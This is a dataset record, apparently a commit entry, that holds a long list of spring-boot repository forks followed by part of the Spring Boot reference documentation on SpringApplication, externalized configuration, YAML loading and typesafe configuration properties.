oot,trecloux\/spring-boot,MasterRoots\/spring-boot,snicoll\/spring-boot,xialeizhou\/spring-boot,donhuvy\/spring-boot,kdvolder\/spring-boot,zorosteven\/spring-boot,ractive\/spring-boot,fireshort\/spring-boot,jxblum\/spring-boot,ydsakyclguozi\/spring-boot,liupugong\/spring-boot,isopov\/spring-boot,shakuzen\/spring-boot,pvorb\/spring-boot,tiarebalbi\/spring-boot,5zzang\/spring-boot,PraveenkumarShethe\/spring-boot,mebinjacob\/spring-boot,hehuabing\/spring-boot,RainPlanter\/spring-boot,mbrukman\/spring-boot,mbnshankar\/spring-boot,lcardito\/spring-boot,spring-projects\/spring-boot,damoyang\/spring-boot,joshthornhill\/spring-boot,vpavic\/spring-boot,nandakishorm\/spring-boot,cbtpro\/spring-boot,kamilszymanski\/spring-boot,cmsandiga\/spring-boot,jvz\/spring-boot,smilence1986\/spring-boot,mackeprm\/spring-boot,trecloux\/spring-boot,master-slave\/spring-boot,VitDevelop\/spring-boot,mike-kukla\/spring-boot,eric-stanley\/spring-boot,patrikbeno\/spring-boot,paddymahoney\/spring-boot,artembilan\/spring-boot,panbiping\/spring-boot,durai145\/spring-boot,linead\/spring-boot,christian-posta\/spring-boot,thomasdarimont\/spring-boot,murilobr\/spring-boot,eliudiaz\/spring-boot,fjlopez\/spring-boot,nurkiewicz\/spring-boot,sbcoba\/spring-boot,raiamber1\/spring-boot,jeremiahmarks\/spring-boot,mackeprm\/spring-boot,lokbun\/spring-boot,kayelau\/spring-boot,JiweiWong\/spring-boot,allyjunio\/spring-boot,oran
gesdk\/spring-boot,yunbian\/spring-boot,shangyi0102\/spring-boot,rweisleder\/spring-boot,forestqqqq\/spring-boot,fulvio-m\/spring-boot,NetoDevel\/spring-boot,orangesdk\/spring-boot,panbiping\/spring-boot,kayelau\/spring-boot,mbrukman\/spring-boot,lexandro\/spring-boot,srinivasan01\/spring-boot,jjankar\/spring-boot,rickeysu\/spring-boot,PraveenkumarShethe\/spring-boot,rizwan18\/spring-boot,habuma\/spring-boot,jorgepgjr\/spring-boot,satheeshmb\/spring-boot,RishikeshDarandale\/spring-boot,mosoft521\/spring-boot,johnktims\/spring-boot,mebinjacob\/spring-boot,nghiavo\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,prakashme\/spring-boot,VitDevelop\/spring-boot,liupd\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,dnsw83\/spring-boot,nghiavo\/spring-boot,mdeinum\/spring-boot,eric-stanley\/spring-boot,spring-projects\/spring-boot,rmoorman\/spring-boot,snicoll\/spring-boot,fjlopez\/spring-boot,ilayaperumalg\/spring-boot,vpavic\/spring-boot,meloncocoo\/spring-boot,allyjunio\/spring-boot,Chomeh\/spring-boot,kiranbpatil\/spring-boot,jbovet\/spring-boot,JiweiWong\/spring-boot,izeye\/spring-boot,RobertNickens\/spring-boot,roymanish\/spring-boot,RishikeshDarandale\/spring-boot,PraveenkumarShethe\/spring-boot,pnambiarsf\/spring-boot,bjornlindstrom\/spring-boot,zorosteven\/spring-boot,akmaharshi\/jenkins,nisuhw\/spring-boot,Chomeh\/spring-boot,meloncocoo\/spring-boot,wwadge\/spring-boot,mlc0202\/spring-boot,mrumpf\/spring-boot,liupugong\/spring-boot,nebhale\/spring-boot,donthadineshkumar\/spring-boot,mlc0202\/spring-boot,raiamber1\/spring-boot,tsachev\/spring-boot,bbrouwer\/spring-boot,minmay\/spring-boot,existmaster\/spring-boot,rweisleder\/spring-boot,marcellodesales\/spring-boot,cleverjava\/jenkins2-course-spring-boot,damoyang\/spring-boot,M3lkior\/spring-boot,MrMitchellMoore\/spring-boot,marcellodesales\/spring-boot,fulvio-m\/spring-boot,RichardCSantana\/spring-boot,auvik\/spring-boot,murilobr\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,M3lkior\/spring-boot,liupd\/spring-boot,fulvio-m\/spring-boot,xialeizhou\/spring-boot,sankin\/spring-boot,RishikeshDarandale\/spring-boot,existmaster\/spring-boot,tbbost\/spring-boot,nandakishorm\/spring-boot,fireshort\/spring-boot,DeezCashews\/spring-boot,xdweleven\/spring-boot,bsodzik\/spring-boot,satheeshmb\/spring-boot,mackeprm\/spring-boot,yhj630520\/spring-boot,bijukunjummen\/spring-boot,navarrogabriela\/spring-boot,smayoorans\/spring-boot,donhuvy\/spring-boot,designreuse\/spring-boot,aahlenst\/spring-boot,xiaoleiPENG\/my-project,lcardito\/spring-boot,zhangshuangquan\/spring-root,thomasdarimont\/spring-boot,qq83387856\/spring-boot,ollie314\/spring-boot,ralenmandao\/spring-boot,ractive\/spring-boot,navarrogabriela\/spring-boot,kayelau\/spring-boot,rizwan18\/spring-boot,Xaerxess\/spring-boot,zorosteven\/spring-boot,ractive\/spring-boot,jforge\/spring-boot,buobao\/spring-boot,shakuzen\/spring-boot,yuxiaole\/spring-boot,xiaoleiPENG\/my-project,axelfontaine\/spring-boot,sungha\/spring-boot,hqrt\/jenkins2-course-spring-boot,kdvolder\/spring-boot,habuma\/spring-boot,Buzzardo\/spring-boot,jcastaldoFoodEssentials\/spring-boot,xc145214\/spring-boot,royclarkson\/spring-boot,bsodzik\/spring-boot,rizwan18\/spring-boot,neo4j-contrib\/spring-boot,yuxiaole\/spring-boot,i007422\/jenkins2-course-spring-boot,jayeshmuralidharan\/spring-boot,clarklj001\/spring-boot,mbnshankar\/spring-boot,auvik\/spring-boot,joansmith\/spring-boot,roberthafner\/spring-boot,gorcz\/spring-boot,patrikbeno\/spring-boot,MrMitchellMoore\/spring-boot,ihoneymon\/spri
ng-boot,simonnordberg\/spring-boot,coolcao\/spring-boot,jforge\/spring-boot,Buzzardo\/spring-boot,eliudiaz\/spring-boot,vaseemahmed01\/spring-boot,sbcoba\/spring-boot,kamilszymanski\/spring-boot,durai145\/spring-boot,kdvolder\/spring-boot,10045125\/spring-boot,vaseemahmed01\/spring-boot,ilayaperumalg\/spring-boot,smayoorans\/spring-boot,designreuse\/spring-boot,buobao\/spring-boot,vakninr\/spring-boot,cbtpro\/spring-boot,jjankar\/spring-boot,smayoorans\/spring-boot,ralenmandao\/spring-boot,philwebb\/spring-boot,navarrogabriela\/spring-boot,mike-kukla\/spring-boot,master-slave\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,ydsakyclguozi\/spring-boot,jbovet\/spring-boot,bsodzik\/spring-boot,neo4j-contrib\/spring-boot,bclozel\/spring-boot,navarrogabriela\/spring-boot,yuxiaole\/spring-boot,Nowheresly\/spring-boot,tbbost\/spring-boot,eonezhang\/spring-boot,murilobr\/spring-boot,bsodzik\/spring-boot,coolcao\/spring-boot,jvz\/spring-boot,forestqqqq\/spring-boot,gorcz\/spring-boot,166yuan\/spring-boot,xiaoleiPENG\/my-project,wwadge\/spring-boot,dnsw83\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,keithsjohnson\/spring-boot,smilence1986\/spring-boot,mabernardo\/spring-boot,PraveenkumarShethe\/spring-boot,rams2588\/spring-boot,javyzheng\/spring-boot,rstirling\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,kiranbpatil\/spring-boot,lingounet\/spring-boot,sebastiankirsch\/spring-boot,mosoft521\/spring-boot,rmoorman\/spring-boot,felipeg48\/spring-boot,hehuabing\/spring-boot,lingounet\/spring-boot,nghiavo\/spring-boot,keithsjohnson\/spring-boot,qerub\/spring-boot,gauravbrills\/spring-boot,bclozel\/spring-boot,xwjxwj30abc\/spring-boot,liupugong\/spring-boot,eddumelendez\/spring-boot,thomasdarimont\/spring-boot,fogone\/spring-boot,christian-posta\/spring-boot,sbcoba\/spring-boot,SaravananParthasarathy\/SPSDemo,5zzang\/spring-boot,xdweleven\/spring-boot,ptahchiev\/spring-boot,hello2009chen\/spring-boot,nghialunhaiha\/spring-boot,neo4j-contrib\/spring-boot,ojacquemart\/spring-boot,aahlenst\/spring-boot,imranansari\/spring-boot,na-na\/spring-boot,duandf35\/spring-boot,lif123\/spring-boot,mosen11\/spring-boot,jack-luj\/spring-boot,nghialunhaiha\/spring-boot,clarklj001\/spring-boot,herau\/spring-boot,raiamber1\/spring-boot,jeremiahmarks\/spring-boot,minmay\/spring-boot,166yuan\/spring-boot,Nowheresly\/spring-boot,AngusZhu\/spring-boot,DeezCashews\/spring-boot,jmnarloch\/spring-boot,axelfontaine\/spring-boot,ractive\/spring-boot,mebinjacob\/spring-boot,ptahchiev\/spring-boot,artembilan\/spring-boot,qq83387856\/spring-boot,raiamber1\/spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,smilence1986\/spring-boot,patrikbeno\/spring-boot,okba1\/spring-boot,johnktims\/spring-boot,npcode\/spring-boot,M3lkior\/spring-boot,DeezCashews\/spring-boot,kamilszymanski\/spring-boot,mosen11\/spring-boot,eonezhang\/spring-boot,allyjunio\/spring-boot,jvz\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,rstirling\/spring-boot,lexandro\/spring-boot,ChunPIG\/spring-boot,hehuabing\/spring-boot,SaravananParthasarathy\/SPSDemo,chrylis\/spring-boot,lenicliu\/spring-boot,michael-simons\/spring-boot,lcardito\/spring-boot,mbnshankar\/spring-boot,rstirling\/spring-boot,afroje-reshma\/spring-boot-sample,lenicliu\/spring-boot,bjornlindstrom\/spring-boot,drunklite\/spring-boot,paweldolecinski\/spring-boot,donthadineshkumar\/spring-boot,simonnordberg\/spring-boot,donhuvy\/spring-boot,smayoorans\/spring-boot,trecloux\/spring-boot,joshiste\/spring-bo
ot,auvik\/spring-boot,lcardito\/spring-boot,DONIKAN\/spring-boot,SaravananParthasarathy\/SPSDemo,mbenson\/spring-boot,mrumpf\/spring-boot,jforge\/spring-boot,dfa1\/spring-boot,prasenjit-net\/spring-boot,nghialunhaiha\/spring-boot,meloncocoo\/spring-boot,5zzang\/spring-boot,kayelau\/spring-boot,lif123\/spring-boot,Xaerxess\/spring-boot,nevenc-pivotal\/spring-boot,dreis2211\/spring-boot,roberthafner\/spring-boot,xingguang2013\/spring-boot,crackien\/spring-boot,AstaTus\/spring-boot,mabernardo\/spring-boot,DONIKAN\/spring-boot,royclarkson\/spring-boot,clarklj001\/spring-boot,Nowheresly\/spring-boot,cleverjava\/jenkins2-course-spring-boot,soul2zimate\/spring-boot,jayarampradhan\/spring-boot,sankin\/spring-boot,artembilan\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,nandakishorm\/spring-boot,huangyugui\/spring-boot,npcode\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,ydsakyclguozi\/spring-boot,tiarebalbi\/spring-boot,tbadie\/spring-boot,linead\/spring-boot,master-slave\/spring-boot,xingguang2013\/spring-boot,paweldolecinski\/spring-boot,ralenmandao\/spring-boot,mohican0607\/spring-boot,royclarkson\/spring-boot,jack-luj\/spring-boot,prakashme\/spring-boot,lif123\/spring-boot,mbenson\/spring-boot,okba1\/spring-boot,philwebb\/spring-boot-concourse,xwjxwj30abc\/spring-boot,deki\/spring-boot,DeezCashews\/spring-boot,DeezCashews\/spring-boot,yunbian\/spring-boot,philwebb\/spring-boot,RobertNickens\/spring-boot,drumonii\/spring-boot,sungha\/spring-boot,hello2009chen\/spring-boot,tsachev\/spring-boot,ameraljovic\/spring-boot,playleud\/spring-boot,roymanish\/spring-boot,joshiste\/spring-boot,lingounet\/spring-boot,okba1\/spring-boot,orangesdk\/spring-boot,hqrt\/jenkins2-course-spring-boot,drunklite\/spring-boot,frost2014\/spring-boot,yuxiaole\/spring-boot,forestqqqq\/spring-boot,joshiste\/spring-boot,linead\/spring-boot,eddumelendez\/spring-boot,raiamber1\/spring-boot,nurkiewicz\/spring-boot,aahlenst\/spring-boot,RainPlanter\/spring-boot,sbcoba\/spring-boot,patrikbeno\/spring-boot,NetoDevel\/spring-boot,hklv\/spring-boot,rmoorman\/spring-boot,drunklite\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,yhj630520\/spring-boot,srikalyan\/spring-boot,rams2588\/spring-boot,kamilszymanski\/spring-boot,SPNilsen\/spring-boot,afroje-reshma\/spring-boot-sample,srikalyan\/spring-boot,playleud\/spring-boot,mike-kukla\/spring-boot,xwjxwj30abc\/spring-boot,drumonii\/spring-boot,dnsw83\/spring-boot,ApiSecRay\/spring-boot,hehuabing\/spring-boot,jvz\/spring-boot,tbadie\/spring-boot,playleud\/spring-boot,auvik\/spring-boot,Chomeh\/spring-boot,tbadie\/spring-boot,jcastaldoFoodEssentials\/spring-boot,ollie314\/spring-boot,fogone\/spring-boot,crackien\/spring-boot,durai145\/spring-boot,eliudiaz\/spring-boot,simonnordberg\/spring-boot,olivergierke\/spring-boot,axelfontaine\/spring-boot,jack-luj\/spring-boot,tiarebalbi\/spring-boot,NetoDevel\/spring-boot,ChunPIG\/spring-boot,hqrt\/jenkins2-course-spring-boot,pvorb\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,JiweiWong\/spring-boot,Buzzardo\/spring-boot,playleud\/spring-boot,akmaharshi\/jenkins,cbtpro\/spring-boot,jorgepgjr\/spring-boot,mohican0607\/spring-boot,sungha\/spring-boot,fireshort\/spring-boot,Xaerxess\/spring-boot,vaseemahmed01\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,vandan16\/Vandan,mosen11\/spring-boot,satheeshmb\/spring-boot,wilkinsona\/spring-boot,RainPlanter\/spring-boot,roymanish\/spring-boot,nelswadycki\/spring-boot,isopov\/s
pring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the '<<getting-started.adoc#getting-started>>' and\n'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n  .   
____          _            __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __  __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/  ___)| |_)| | | | | || (_| |  ) ) ) )\n  '  |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.encoding` (default is UTF-8).\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setShowBanner(false);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor Spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See '<<boot-features-external-config>>' for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a ``fluent'' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.showBanner(false)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. 
See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]\nfor full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being the\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a ``web environment'' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`\nwithin a JUnit test.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the CommandLineRunner\nIf you want access to the raw command line arguments, or you need to run some specific code\nonce the `SpringApplication` has started you can implement the `CommandLineRunner`\ninterface. The `run(String... args)` method will be called on all Spring beans\nimplementing this interface.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*;\n\timport org.springframework.stereotype.*;\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t\tpublic void run(String... args) {\n\t\t\t\/\/ Do something...\n\t\t}\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`\nbeans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. 
All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or bound to structured objects.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values. Properties are considered in the following order:\n\n. Command line arguments.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. JNDI attributes from `java:comp\/env`.\n. A `RandomValuePropertySource` that only has properties in `random.*`.\n. Application properties outside of your packaged jar (`application.properties`\n including YAML and profile variants).\n. Application properties packaged inside your jar (`application.properties`\n including YAML and profile variants).\n. `@PropertySource` annotations on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*;\n\timport org.springframework.beans.factory.annotation.*;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Value(\"${name}\")\n\t\tprivate String name;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `random.int*` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith ``--'', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. 
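For example, to run the hypothetical packaged application `app.jar` mentioned above on a different port you could launch it as follows:\n\n[indent=0]\n----\n\t$ java -jar app.jar --server.port=9000\n----\n\n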
As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory.\n. A classpath `\/config` package.\n. The classpath root.\n\nThe list is ordered by precedence (locations higher in the list override lower items).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override them at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating systems\ndisallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile specific properties\nIn addition to `application.properties` files, profile specific properties can also be\ndefined using the naming convention `application-{profile}.properties`.\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile-specific files overriding the default ones.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create ``short'' variants of existing Spring Boot\nproperties. 
See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/code.google.com\/p\/snakeyaml\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use ``starter POMs'' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Boot provides two convenient classes that can be used to load YAML documents. The\n`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`\nwill load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\tmy:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above:\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholder syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. 
If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`.\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nWhen the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,\nany beans annotated with `@ConfigurationProperties` will be automatically configured\nfrom the `Environment` properties. This style of configuration works particularly well\nwith the `SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t\t\/\/ ...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` 